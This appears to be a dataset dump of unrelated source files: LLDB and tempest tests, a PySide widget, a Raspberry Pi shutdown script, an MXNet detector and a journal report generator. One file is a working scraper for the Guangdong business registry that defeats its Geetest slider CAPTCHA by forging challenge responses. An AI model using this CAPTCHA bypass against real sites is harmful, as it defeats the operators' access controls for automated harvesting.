self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# Get Frame #0.
self.assertEquals(process.GetState(), lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(
process, lldb.eStopReasonBreakpoint)
self.assertTrue(
thread.IsValid(),
"There should be a thread stopped due to breakpoint condition")
frame0 = thread.GetFrameAtIndex(0)
# Verify that we can access to a frame variable with an empty class type
e = frame0.FindVariable('e')
self.assertTrue(e.IsValid(), VALID_VARIABLE)
self.DebugSBValue(e)
self.assertEqual(e.GetNumChildren(), 0)
# Verify that we can acces to a frame variable what is a pointer to an
# empty class
ep = frame0.FindVariable('ep')
self.assertTrue(ep.IsValid(), VALID_VARIABLE)
self.DebugSBValue(ep)
# Verify that we can dereference a pointer to an empty class
epd = ep.Dereference()
self.assertTrue(epd.IsValid(), VALID_VARIABLE)
self.DebugSBValue(epd)
self.assertEqual(epd.GetNumChildren(), 0)
| apache-2.0 | 5,723,604,370,292,421,000 | 34.963636 | 80 | 0.651668 | false |
nikolay-fedotov/tempest | tempest/scenario/test_large_ops.py | 1 | 3433 | # Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common.utils import data_utils
from tempest import config
from tempest.openstack.common import log as logging
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestLargeOpsScenario(manager.ScenarioTest):
"""
Test large operations.
This test below:
* Spin up multiple instances in one nova call, and repeat three times
* as a regular user
* TODO: same thing for cinder
"""
@classmethod
def resource_setup(cls):
if CONF.scenario.large_ops_number < 1:
raise cls.skipException("large_ops_number not set to multiple "
"instances")
cls.set_network_resources()
super(TestLargeOpsScenario, cls).resource_setup()
def _wait_for_server_status(self, status):
for server in self.servers:
# Make sure nova list keeps working throughout the build process
self.servers_client.list_servers()
self.servers_client.wait_for_server_status(server['id'], status)
def nova_boot(self):
name = data_utils.rand_name('scenario-server-')
flavor_id = CONF.compute.flavor_ref
secgroup = self._create_security_group()
self.servers_client.create_server(
name,
self.image,
flavor_id,
min_count=CONF.scenario.large_ops_number,
security_groups=[secgroup])
# needed because of bug 1199788
params = {'name': name}
_, server_list = self.servers_client.list_servers(params)
self.servers = server_list['servers']
for server in self.servers:
# after deleting all servers - wait for all servers to clear
# before cleanup continues
self.addCleanup(self.servers_client.wait_for_server_termination,
server['id'])
for server in self.servers:
self.addCleanup_with_wait(
waiter_callable=(self.servers_client.
wait_for_server_termination),
thing_id=server['id'], thing_id_param='server_id',
cleanup_callable=self.delete_wrapper,
cleanup_args=[self.servers_client.delete_server, server['id']])
self._wait_for_server_status('ACTIVE')
def _large_ops_scenario(self):
self.glance_image_create()
self.nova_boot()
@test.services('compute', 'image')
def test_large_ops_scenario_1(self):
self._large_ops_scenario()
@test.services('compute', 'image')
def test_large_ops_scenario_2(self):
self._large_ops_scenario()
@test.services('compute', 'image')
def test_large_ops_scenario_3(self):
self._large_ops_scenario()
| apache-2.0 | 6,109,670,027,558,396,000 | 34.760417 | 79 | 0.635887 | false |
DayGitH/Family-Tree | node.py | 1 | 3177 | from PySide import QtCore, QtGui
import sys
class Actor(QtGui.QGraphicsWidget):
nick_name = ''
real_name = ''
gender = ''
bday = ''
age = ''
marital = ''
children = ''
death = ''
important = False
notes = ''
def __init__(self, nick_name, real_name, gender, bday, age, marital, children, death, important, notes, parent=None):
super(Actor, self).__init__(parent)
self.nick_name = nick_name
self.real_name = real_name
self.gender = gender
self.bday = bday
self.age = age
if marital == ['S000']:
self.marital = 'Single'
elif marital[-1][0] == 'M':
self.marital = 'Married'
elif marital[-1][0] == 'W':
self.marital = 'Widower' if self.gender == 'M' else ('Widow' if gender == 'F' else '')
elif marital[-1][0] == 'D':
self.marital = 'Divorced'
elif marital[-1][0] == 'E':
self.marital = 'Engaged'
if children == ['']:
self.children = 0
else:
self.children = len(children)
self.death = death
self.important = important
self.notes = notes
def headerRect(self):
return QtCore.QRectF(-55,-60,110,35)
def boundingRect(self):
return QtCore.QRectF(-60, -60, 120, 120)
def shape(self):
path = QtGui.QPainterPath()
path.addEllipse(self.boundingRect())
return path
def paint(self, painter, option, widget):
r = self.boundingRect()
h = self.headerRect()
painter.setBrush(QtGui.QColor.fromHsv(255,0,255,160))
painter.drawEllipse(r)
if self.gender == 'M':
painter.setBrush(QtGui.QColor.fromHsv(240,255,255,255))
elif self.gender == 'F':
painter.setBrush(QtGui.QColor.fromHsv(0,255,255,255))
painter.drawRoundedRect(h,5,5)
text = self.nick_name
painter.setPen(QtCore.Qt.white)
painter.drawText(h,QtCore.Qt.AlignCenter, text)
text = '\n'.join((self.real_name, str(self.age) + ' - ' + self.marital,
self.bday, 'Children: ' + str(self.children)))
painter.setPen(QtCore.Qt.black)
painter.drawText(r,QtCore.Qt.AlignCenter, text)
class View(QtGui.QGraphicsView):
def resizeEvent(self, event):
super(View, self).resizeEvent(event)
self.fitInView(self.sceneRect(), QtCore.Qt.KeepAspectRatio)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene(-350,-350,700,700)
actor = Actor('Akber','Akber Ali','M','1991-Jan-28', 23,'Single',0,'2051-Jan-28',True, '')
actor.setPos(0,0)
scene.addItem(actor)
view = View(scene)
view.setWindowTitle("Animated Tiles")
view.setViewportUpdateMode(QtGui.QGraphicsView.BoundingRectViewportUpdate)
view.setCacheMode(QtGui.QGraphicsView.CacheBackground)
view.setRenderHints(
QtGui.QPainter.Antialiasing | QtGui.QPainter.SmoothPixmapTransform)
view.show()
sys.exit(app.exec_()) | cc0-1.0 | 5,410,718,640,994,726,000 | 30.78 | 121 | 0.56972 | false |
9468305/script | geetest_offline/geetest_offline_gd.py | 1 | 12177 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
'''
geetest offline 6.0.0 spider for gd.gsxt.org.cn
'''
import os
import time
import random
import logging
from logging import NullHandler
import json
import requests
import execjs
from bs4 import BeautifulSoup
import constants
import util
logging.getLogger(__name__).addHandler(NullHandler())
logging.basicConfig(level=logging.DEBUG)
HOST = 'http://gd.gsxt.gov.cn'
INDEX = HOST
JSRUNTIME = execjs.get(execjs.runtime_names.Node)
USERRESPONSE_JSCONTEXT = JSRUNTIME.compile(util.USERRESPONSE_JS)
TIMEOUT = 15
GD_LIST_FILE = 'gd_list.json'
GD_RESULT_FILE = 'gd_result.json'
GD_NOTFOUND_FILE = 'gd_notfound.json'
def load_json(json_file):
'''load json file'''
if not os.path.isfile(json_file):
logging.info("Json File Not Exist")
return None
with open(json_file, 'r', encoding='utf8') as _f:
json_data = json.load(_f)
logging.info(len(json_data))
return json_data
def save_json(json_file, json_data):
'''save json file'''
with open(json_file, 'w', encoding='utf8') as _f:
json.dump(json_data, _f, indent=2, sort_keys=True, ensure_ascii=False)
logging.info(len(json_data))
def calc_userresponse(distance, challenge):
'''根据滑动距离 distance 和 challenge ,计算 userresponse。'''
return USERRESPONSE_JSCONTEXT.call('userresponse', distance, challenge)
def calc_validate(challenge):
'''calculate validate'''
_r = random.randint(0, len(util.OFFLINE_SAMPLE)-1)
distance, rand0, rand1 = util.OFFLINE_SAMPLE[_r]
distance_r = calc_userresponse(distance, challenge)
rand0_r = calc_userresponse(rand0, challenge)
rand1_r = calc_userresponse(rand1, challenge)
validate = distance_r + '_' + rand0_r + '_' + rand1_r
logging.debug(validate)
return validate
def parse_name_url(html_doc):
'''使用BeautifulSoup解析HTML页面,查找详情链接'''
_soup = BeautifulSoup(html_doc, 'html.parser')
_findall = _soup.find_all('div',
class_="clickStyle",
style='margin-left: 160px;padding-left: 10px;')
name_url_array = []
if _findall:
for _a in _findall:
_company = _a.find('a')
_name = ''.join(_company.get_text().split())
_url = _company['href']
if _url.startswith('../'):
_url = INDEX + '/aiccips/CheckEntContext/' + _url
name_url_array.append((_name, _url))
logging.info(name_url_array)
else:
logging.error('Company Link Not Found')
return name_url_array
def get_mainpage(session):
'''
Get http://gd.gsxt.gov.cn
Response Code 200
'''
logging.debug('GET ' + INDEX)
_headers = {'Accept': constants.ACCEPT_HTML,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT}
_response = session.get(INDEX, headers=_headers, timeout=TIMEOUT)
logging.debug('response code:' + str(_response.status_code))
return _response.status_code == 200
def get_captcha(session):
'''
GET /aiccips//verify/start.html
Response JSON
{
"success": 0,
"gt": "c02ee51ee0afe88899efe6dc729627fc",
"challenge": "ed3d2c21991e3bef5e069713af9fa6caed"
}
'''
_url = INDEX + '/aiccips//verify/start.html'
logging.debug('GET ' + _url)
_headers = {'Accept': constants.ACCEPT_JSON,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT,
'Referer': INDEX,
'X-Requested-With': 'XMLHttpRequest'}
_params = {'t': str(int(time.time() * 1000))}
_response = session.get(_url, headers=_headers, params=_params, timeout=TIMEOUT)
logging.debug('response code: ' + str(_response.status_code))
logging.debug('response text: ' + _response.text)
if _response.status_code != 200:
return False
return _response.json()
def post_validate(session, challenge, validate, keyword):
'''
POST /aiccips/verify/sec.html
Response JSON
{
"status": "success",
"textfield": "waY5F5lZyxvKw9bMM4nBs7HUgWS1SRpagFutRKqs/+DkRqCIS9N4PUCqM9fmrbg1",
"version": "3.3.0"
}
'''
_url = INDEX + '/aiccips/verify/sec.html'
logging.debug('POST ' + _url)
_headers = {'Accept': constants.ACCEPT_JSON,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT,
'Referer': INDEX,
'X-Requested-With': 'XMLHttpRequest',
'Origin': HOST}
_params = [('textfield', keyword),
('geetest_challenge', challenge),
('geetest_validate', validate),
('geetest_seccode', validate + '|jordan')]
_response = session.post(_url, headers=_headers, data=_params, timeout=TIMEOUT)
logging.debug('response code: ' + str(_response.status_code))
logging.debug('response text: ' + _response.text)
if _response.status_code != 200:
return False
_json_obj = _response.json()
logging.debug(_json_obj)
return _json_obj['textfield'] if _json_obj['status'] == 'success' else None
def post_search(session, textfield):
'''
POST /aiccips/CheckEntContext/showCheck.html
Response HTML WebPage
'''
_url = INDEX + '/aiccips/CheckEntContext/showCheck.html'
logging.debug('POST ' + _url)
_headers = {'Accept': constants.ACCEPT_HTML,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT,
'Referer': INDEX,
'X-Requested-With': 'XMLHttpRequest',
'Origin': HOST}
_params = [('textfield', textfield),
('type', 'nomal')]
_response = session.post(_url, headers=_headers, data=_params, timeout=TIMEOUT)
logging.debug('response code: ' + str(_response.status_code))
logging.debug('response text: ' + _response.text)
if _response.status_code != 200:
return None
return parse_name_url(_response.text)
def get_validate(session, keyword):
'''safe loop post validate'''
for _ in range(10):
captcha = get_captcha(session)
if not captcha:
return None
validate = calc_validate(captcha['challenge'])
textfield = post_validate(session, captcha['challenge'], validate, keyword)
if textfield:
return textfield
return None
def parse_detail_sz(html_doc):
'''parse company detail for shenzhen'''
_soup = BeautifulSoup(html_doc, 'html.parser')
_yyzz = _soup.find('div', class_='item_box', id='yyzz')
if not _yyzz:
logging.error('Detail yyzz Not Found')
return None
_li_all = _yyzz.find_all('li')
if not _li_all:
logging.error("Detail li Not Found")
return None
_info = {}
for _li in _li_all:
_text = ''.join(_li.get_text().split())
_k, _v = _text.split(sep=':', maxsplit=1)
_info[_k] = _v
logging.info(_info)
if not _info['企业名称']:
_info = None # for safe
return _info
def parse_detail(html_doc):
'''parse company detail for guangzhou and other'''
_soup = BeautifulSoup(html_doc, 'html.parser')
_table = _soup.find('table', cellspacing='6')
if not _table:
logging.error('Detail table Not Found')
return None
_tr_all = _table.find_all('td')
if not _tr_all:
logging.error("Detail td Not Found")
return None
_info = {}
for _td in _tr_all:
_text = ''.join(_td.get_text().split())
if _text == '营业执照信息':
continue
_k, _v = _text.split(sep=':', maxsplit=1)
_temp = {}
_temp[_k] = _v
for _k2, _v2 in _temp.items():
if _k2 == '.企业名称' or _k2 == '.名称':
_info['企业名称'] = _v2
elif _k2 == '.统一社会信用代码/注册号' or _k2 == '.注册号':
_info['注册号/统一社会信用代码'] = _v2
elif _k2 == '.类型':
_info['类型'] = _v2
elif _k2 == '.负责人' or _k2 == '.经营者':
_info['法定代表人'] = _v2
elif _k2 == '.成立日期' or _k2 == '.注册日期':
_info['成立日期'] = _v2
elif _k2 == '.营业期限自':
_info['营业期限自'] = _v2
elif _k2 == '.营业期限至':
_info['营业期限至'] = _v2
elif _k2 == '.登记机关':
_info['登记机关'] = _v2
elif _k2 == '.核准日期':
_info['核准日期'] = _v2
elif _k2 == '.登记状态':
_info['登记状态'] = _v2
elif _k2 == '.营业场所' or _k2 == '.经营场所':
_info['住所'] = _v2
elif _k2 == '.经营范围':
_info['经营范围'] = _v2
_info['注册资本'] = '0'
logging.info(_info)
if not _info['企业名称']:
_info = None # for safe
return _info
def query_keyword(session, keyword):
'''query keyword'''
#if not get_mainpage(session):
# return None
logging.info(keyword)
textfield = get_validate(session, keyword)
if textfield:
return post_search(session, textfield)
return None
def safe_query_keyword(keyword):
'''Safe query keyword, handle network timeout and retry'''
for _ in range(5):
try:
with requests.Session() as session:
return query_keyword(session, keyword)
except requests.RequestException as _e:
logging.error(_e)
time.sleep(5)
return None
def query_detail(session, url):
'''query company detail url'''
logging.debug('GET ' + url)
_headers = {'Accept': constants.ACCEPT_HTML,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT}
_response = session.get(url, headers=_headers, timeout=TIMEOUT)
logging.debug('response code:' + str(_response.status_code))
if _response.status_code == 200:
if url.find('www.szcredit.org.cn') is not -1:
return parse_detail_sz(_response.text)
elif url.find('GSpublicityList.html') is not -1:
return parse_detail(_response.text)
else:
logging.error('URL Type Not Support')
return None
def safe_query_detail(url):
'''Safe query url, handle network timeout and retry multi times.'''
for _ in range(5):
try:
with requests.Session() as session:
return query_detail(session, url)
except requests.RequestException as _e:
logging.error(_e)
time.sleep(5)
return None
def query_entry():
'''main entry'''
lists = load_json(GD_LIST_FILE)
if not lists:
lists = []
results = load_json(GD_RESULT_FILE)
if not results:
results = {}
notfound = load_json(GD_NOTFOUND_FILE)
if not notfound:
notfound = []
for keyword in lists:
if keyword in results:
continue
if keyword in notfound:
continue
name_url_array = safe_query_keyword(keyword)
if not name_url_array:
notfound.append(keyword)
continue
for name, url in name_url_array:
if name in results:
continue
detail_dict = safe_query_detail(url)
if detail_dict:
results.update({name : detail_dict})
save_json('result.json', results)
save_json('notfound.json', notfound)
logging.info('done')
if __name__ == "__main__":
query_entry()
| mit | -263,166,151,455,258,660 | 30.441096 | 85 | 0.556119 | false |
HugoMMRabson/fonsa | src/my/installer/copyintomaple/atxraspisettings.py | 1 | 6164 | #!/usr/bin/python3
'''
Created on Aug 18, 2019
@author: johnrabsonjr
'''
import os
from queue import Queue
import sys
import time
import RPi.GPIO as GPIO # @UnresolvedImport
REBOOTPULSEMINIMUM = None
REBOOTPULSEMAXIMUM = None
SHUT_DOWN = None
BOOTOK = None
ATXRASPI_SOFTBTN = None
FACTORYRESET = None
GREEN22 = None
BLUE23 = None
RED15 = None
PB1000C_LBO = None
MAPLEDRIVE = None
PB1000C_SHOULD_I_PULL_UP_OR_DOWN = None
WHITE, PERIWINKLE, YELLOW, GREEN, VIOLET, BLUE, RED, BLACK = ('white', 'periwinkle', 'yellow', 'green', 'violet', 'blue', 'red', 'black')
ALL_POTENTIAL_COLORS = (WHITE, PERIWINKLE, YELLOW, GREEN, VIOLET, BLUE, RED, BLACK)
def singleton(cls):
"""
See http://stackoverflow.com/questions/674304/pythons-use-of-new-and-init?ref=mythemeco&t=pack for explanation
"""
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls()
return instances[cls]
return getinstance
def is_battery_low():
return True if GPIO.input(PB1000C_LBO) == 0 else False
def shut_it_down(reboot=False):
# MyLEDController.show_led_color(RED)
# GPIO.output(BOOTOK, 0)
if reboot:
logit("shut_it_down is rebooting me")
if MAPLEDRIVE:
logit("... but we're a mapledrive. So, in all likelihood, reboot=>shutdown.")
os.system('sudo reboot')
else:
logit("shut_it_down is calling poweroff")
GPIO.output(ATXRASPI_SOFTBTN, 1)
os.system('sudo poweroff')
def poweroff_now(reboot=False):
magic_key = 'b' if reboot else 'o'
for (val,
fname) in (('3',
'/proc/sys/kernel/printk'), ('3',
'/proc/sys/vm/drop_caches'),
('256', '/proc/sys/vm/min_free_kbytes'),
('1', '/proc/sys/vm/overcommit_memory'),
('1', '/proc/sys/vm/oom_kill_allocating_task'),
('0', '/proc/sys/vm/oom_dump_tasks'),
('1', '/proc/sys/kernel/sysrq'), (magic_key,
'/proc/sysrq-trigger')):
with open(fname, 'w') as f:
f.write(
val
) # See http://major.io/2009/01/29/linux-emergency-reboot-or-shutdown-with-magic-commands/
def logit(s):
print(s)
os.system('echo "$(date) %s" >> /var/log/atxraspi.log' % s)
def setup_gpio():
GPIO.setmode(GPIO.BOARD)
GPIO.setup(BOOTOK, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(ATXRASPI_SOFTBTN, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(SHUT_DOWN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
if MAPLEDRIVE:
GPIO.setup(GREEN22, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(BLUE23, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(RED15, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(PB1000C_LBO, GPIO.IN, pull_up_down=PB1000C_SHOULD_I_PULL_UP_OR_DOWN)
GPIO.setup(FACTORYRESET, GPIO.IN, pull_up_down=GPIO.PUD_UP)
class ThreadToServiceGPIOLED(object):
""" Threading example class
The run() method will be started and it will run in the background
until the application exits.
"""
def __init__(self, q):
""" Constructor
:type interval: int
:param interval: Check interval, in seconds
"""
import threading
self.q = q
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
self.coldct = { WHITE:(0, 0, 0), PERIWINKLE:(0, 0, 1), YELLOW:(0, 1, 0), GREEN:(0, 1, 1), VIOLET:(1, 0, 0), BLUE:(1, 0, 1), RED:(1, 1, 0), BLACK:(1, 1, 1) }
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
old_color_chain = None
while True:
if self.q.empty() is True:
if old_color_chain is None:
time.sleep(.1) # There's no flashing for us to do.
else:
self.flash_the_led_in_this_sequence(old_color_chain)
else:
try:
color_chain, repetitions = self.q.get(timeout=5)
except:
logit("That's odd. Queue wasn't empty a moment ago, but it is now.")
else:
assert(repetitions >= 0)
if repetitions > 0:
for _ in range(repetitions):
self.flash_the_led_in_this_sequence(color_chain)
else:
old_color_chain = color_chain
def flash_the_led_in_this_sequence(self, color_chain):
for (col, dur) in color_chain:
self.illuminate_led_appropriately(col)
time.sleep(dur)
def illuminate_led_appropriately(self, pulse_color):
a, b, c = self.coldct[pulse_color]
try:
GPIO.output(GREEN22, a)
GPIO.output(BLUE23, b)
GPIO.output(RED15, c)
except RuntimeError:
print("Warning --- you haven't run setup_gpio() yet. Therefore, I can't set the colors of the LEDs yet.")
def get_cpu_temp(): # get_cpu_temp_raw()
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
t = float(f.read().strip('\n')) / 1000.
return t
except Exception as ex: # (FileNotFoundError, TypeError, ValueError) as ex:
logit('''get_cpu_temp failed --- %s --- returning 0''' % str(ex))
return 0.
@singleton
class _MyLEDController:
def __init__(self):
self.q = Queue(maxsize=0)
self.thr = ThreadToServiceGPIOLED(self.q)
def set_this_group_as_default(self, color_chain):
self.q.put([color_chain, 0])
def flash_this_group_only_once(self, color_chain):
self.q.put([color_chain, 1])
def flash_this_group_repeatedly(self, color_chain, count):
self.q.put([color_chain, count])
def set_default_led_color(self, a_color):
self.q.put([[(a_color, .2)], 0])
def flash_this_led_color_once(self, a_color, dur):
self.q.put([[(a_color, dur)], 1])
MyLEDController = _MyLEDController() if MAPLEDRIVE else None
| gpl-3.0 | 1,488,395,012,073,988,600 | 31.442105 | 164 | 0.571544 | false |
liumusicforever/mxnet-yolo | detect/detector.py | 1 | 7005 | from __future__ import print_function
import mxnet as mx
import numpy as np
from timeit import default_timer as timer
from dataset.testdb import TestDB
from dataset.iterator import DetIter
class Detector(object):
"""
SSD detector which hold a detection network and wraps detection API
Parameters:
----------
symbol : mx.Symbol
detection network Symbol
model_prefix : str
name prefix of trained model
epoch : int
load epoch of trained model
data_shape : int
input data resize shape
mean_pixels : tuple of float
(mean_r, mean_g, mean_b)
batch_size : int
run detection with batch size
ctx : mx.ctx
device to use, if None, use mx.cpu() as default context
"""
def __init__(self, symbol, model_prefix, epoch, data_shape, mean_pixels, \
batch_size=1, ctx=None):
self.ctx = ctx
if self.ctx is None:
self.ctx = mx.cpu()
load_symbol, args, auxs = mx.model.load_checkpoint(model_prefix, epoch)
if symbol is None:
symbol = load_symbol
self.mod = mx.mod.Module(symbol, label_names=("yolo_output_label",), context=ctx)
self.data_shape = data_shape
self.mod.bind(data_shapes=[('data', (batch_size, 3, data_shape, data_shape))],
label_shapes=[('yolo_output_label', (batch_size, 2, 5))])
self.mod.set_params(args, auxs)
self.data_shape = data_shape
self.mean_pixels = mean_pixels
def detect(self, det_iter, show_timer=False):
"""
detect all images in iterator
Parameters:
----------
det_iter : DetIter
iterator for all testing images
show_timer : Boolean
whether to print out detection exec time
Returns:
----------
list of detection results
"""
num_images = det_iter._size
if not isinstance(det_iter, mx.io.PrefetchingIter):
det_iter = mx.io.PrefetchingIter(det_iter)
# import time
# time.sleep(5) # delays for 5 seconds
# print("Stop sleep")
start = timer()
detections = self.mod.predict(det_iter).asnumpy()
time_elapsed = timer() - start
if show_timer:
print("Detection time for {} images: {:.4f} sec".format(
num_images, time_elapsed))
result = []
for i in range(detections.shape[0]):
det = detections[i, :, :]
res = det[np.where(det[:, 0] >= 0)[0]]
result.append(res)
# tmp_result = []
# result = []
# start = timer()
# for det in self.mod.iter_predict(det_iter):
# det = det[0][0][0].as_in_context(mx.cpu())
# tmp_result.append(det)
# time_elapsed = timer() - start
# if show_timer:
# print("Detection time for {} images: {:.4f} sec".format(
# num_images, time_elapsed))
# for det in tmp_result:
# det = det.asnumpy()
# res = det[np.where(det[:, 0] >= 0)[0]]
# result.append(res)
return result
def im_detect(self, im_list, root_dir=None, extension=None, show_timer=False):
"""
wrapper for detecting multiple images
Parameters:
----------
im_list : list of str
image path or list of image paths
root_dir : str
directory of input images, optional if image path already
has full directory information
extension : str
image extension, eg. ".jpg", optional
Returns:
----------
list of detection results in format [det0, det1...], det is in
format np.array([id, score, xmin, ymin, xmax, ymax]...)
"""
test_db = TestDB(im_list, root_dir=root_dir, extension=extension)
test_iter = DetIter(test_db, 1, self.data_shape, self.mean_pixels,
is_train=False)
return self.detect(test_iter, show_timer)
def visualize_detection(self, img, dets, classes=[], thresh=0.6):
"""
visualize detections in one image
Parameters:
----------
img : numpy.array
image, in bgr format
dets : numpy.array
ssd detections, numpy.array([[id, score, x1, y1, x2, y2]...])
each row is one object
classes : tuple or list of str
class names
thresh : float
score threshold
"""
import matplotlib.pyplot as plt
import random
plt.imshow(img)
height = img.shape[0]
width = img.shape[1]
colors = dict()
for i in range(dets.shape[0]):
cls_id = int(dets[i, 0])
if cls_id >= 0:
score = dets[i, 1]
if score > thresh:
if cls_id not in colors:
colors[cls_id] = (random.random(), random.random(), random.random())
xmin = int(dets[i, 2] * width)
ymin = int(dets[i, 3] * height)
xmax = int(dets[i, 4] * width)
ymax = int(dets[i, 5] * height)
rect = plt.Rectangle((xmin, ymin), xmax - xmin,
ymax - ymin, fill=False,
edgecolor=colors[cls_id],
linewidth=3.5)
plt.gca().add_patch(rect)
class_name = str(cls_id)
if classes and len(classes) > cls_id:
class_name = classes[cls_id]
plt.gca().text(xmin, ymin - 2,
'{:s} {:.3f}'.format(class_name, score),
bbox=dict(facecolor=colors[cls_id], alpha=0.5),
fontsize=12, color='white')
plt.show()
def detect_and_visualize(self, im_list, root_dir=None, extension=None,
classes=[], thresh=0.6, show_timer=False):
"""
wrapper for im_detect and visualize_detection
Parameters:
----------
im_list : list of str or str
image path or list of image paths
root_dir : str or None
directory of input images, optional if image path already
has full directory information
extension : str or None
image extension, eg. ".jpg", optional
Returns:
----------
"""
import cv2
dets = self.im_detect(im_list, root_dir, extension, show_timer=show_timer)
if not isinstance(im_list, list):
im_list = [im_list]
assert len(dets) == len(im_list)
for k, det in enumerate(dets):
img = cv2.imread(im_list[k])
img[:, :, (0, 1, 2)] = img[:, :, (2, 1, 0)]
self.visualize_detection(img, det, classes, thresh)
| mit | 3,145,396,783,711,416,000 | 35.675393 | 92 | 0.513919 | false |
scieloorg/journals-catalog | jcatalog/reports/fapesp_evaluation_line.py | 1 | 43533 | # coding: utf-8
import pyexcel
import xlsxwriter
import models
import re
import datetime
from accent_remover import *
def formatindicator(indicator):
data = indicator
if type(indicator) == str:
if '.' in indicator and '>' not in indicator:
data = float(indicator)
return data
def formatjcr(indicator):
data = indicator
if type(indicator) == str:
if '.' in indicator and '>' not in indicator:
data = float(indicator)
elif '>10' in indicator:
data = 10
else:
data = None
return data
def formatman(indicator):
data = indicator
if type(indicator) == str:
data = None
return data
def timesfmt(data):
if isinstance(data, float):
num = round(data, 2)
elif isinstance(data, int):
num = data
else:
if isinstance(data, str):
num = None
return num
def journal(query, filename, sheetname, issn, atfile):
# Creates the Excel folder and add a worksheet
if issn:
workbook = xlsxwriter.Workbook('output/journals/' + filename)
worksheet = workbook.add_worksheet(sheetname)
else:
workbook = xlsxwriter.Workbook('output/' + filename)
worksheet = workbook.add_worksheet(sheetname)
worksheet.freeze_panes(1, 0)
worksheet.set_row(0, 70)
# HEADER
col = 0
wrap_header = workbook.add_format({'text_wrap': True, 'size': 9})
format_date_iso = workbook.add_format({'num_format': 'yyyymmdd'})
sheet_header = pyexcel.get_sheet(
file_name='data/scielo/rotulos_avaliacao_fapesp_abel.xlsx',
sheet_name='rotulos_dados_periodicos',
name_columns_by_row=0)
headers = sheet_header.to_records()
for h in headers:
worksheet.write(0, col, h['rotulo_portugues'], wrap_header)
col += 1
extraction_date = models.Scielofapesp.objects.first().extraction_date
# SciELO
scielo = query
row = 1
for doc in scielo:
for h in [
'anterior',
'2008',
'2009',
'2010',
'2011',
'2012',
'2013',
'2014',
'2015',
'2016',
'2017',
'2018'
]:
print(doc.issn_scielo + '_' + str(h))
col = 0
worksheet.write(row, col, extraction_date, format_date_iso)
col += 1
# ativo em 2018
active = 0
if doc.title_current_status == 'current':
active = 1
worksheet.write(row, col, active)
col += 1
# ativo no ano
ativo_y = 0
if 'docs' in doc:
if 'docs_' + h in doc['docs']:
# print(doc['docs']['docs_'+h])
if doc['docs']['docs_' + h] == '':
ativo_y = 0
elif int(doc['docs']['docs_' + h]) > 0:
ativo_y = 1
worksheet.write(row, col, ativo_y)
col += 1
# ISSN SciELO
worksheet.write(row, col, doc.issn_scielo)
col += 1
worksheet.write(row, col, '; '.join(doc.issn_list))
col += 1
worksheet.write(row, col, doc.title)
col += 1
if doc['is_scopus'] == 1:
scopus = models.Scopus.objects.filter(id=str(doc.scopus_id))[0]
worksheet.write(row, col, scopus.title)
col += 1
if doc['is_wos'] == 1:
# wos = models.Wos.objects.filter(id=str(doc.wos_id))[0]
worksheet.write(row, col, doc['wos_indexes'][0]['title'])
col += 1
# DOI Prefix e publisher
worksheet.write(row, col, doc.crossref['doi_provider']['prefix'])
col += 1
worksheet.write(row, col, doc.crossref[
'doi_provider']['publisher'])
col += 1
if 'url' in doc['api']:
worksheet.write(row, col, doc.api['url'])
col += 1
# URL
doajapi = models.Doajapi.objects.filter(issn_list=doc.issn_scielo)
if doajapi:
if 'editorial_review' in doajapi[0]['results'][0]['bibjson']:
url_journal = doajapi[0]['results'][0][
'bibjson']['editorial_review']['url']
worksheet.write(row, col, url_journal)
col += 1
# Publisher Name
worksheet.write(row, col, doc.publisher_name)
col += 1
# Country
worksheet.write(row, col, doc.country)
col += 1
if doc['is_scopus'] == 1:
scopus = models.Scopus.objects.filter(id=str(doc.scopus_id))[0]
worksheet.write(row, col, scopus.country)
col += 1
if doc['is_wos'] == 1:
for i in doc['issn_list']:
wos = models.Wos.objects.filter(issn_list=i)
if len(wos) > 0:
worksheet.write(row, col, wos[0].country)
else:
worksheet.write(row, col, doc.country)
col += 1
# Submissions - Manager System
col = 16
submiss = models.Submissions.objects.filter(
issn_list=doc.issn_scielo)
if submiss:
# descricao sist. gestao
sist = 'ND'
if submiss[0]['scholarone'] == 1:
sist = 'ScholarOne'
elif submiss[0]['ojs_scielo'] == 1:
sist = 'OJS-SciELO'
elif submiss[0]['ojs_outro'] == 1:
sist = 'OJS-Outro'
elif submiss[0]['outro'] == 1:
sist = 'Outro'
worksheet.write(row, col, sist)
col += 1
if 'scholarone' in submiss[0]:
worksheet.write(row, col, submiss[0]['scholarone'] or 0)
col += 1
if 'ojs_scielo' in submiss[0]:
worksheet.write(row, col, submiss[0]['ojs_scielo'] or 0)
col += 1
if 'ojs_outro' in submiss[0]:
worksheet.write(row, col, submiss[0]['ojs_outro'] or 0)
col += 1
# Para outro ou ND == 1
if 'outro' in submiss[0]:
worksheet.write(row, col, submiss[0]['outro'] or 0)
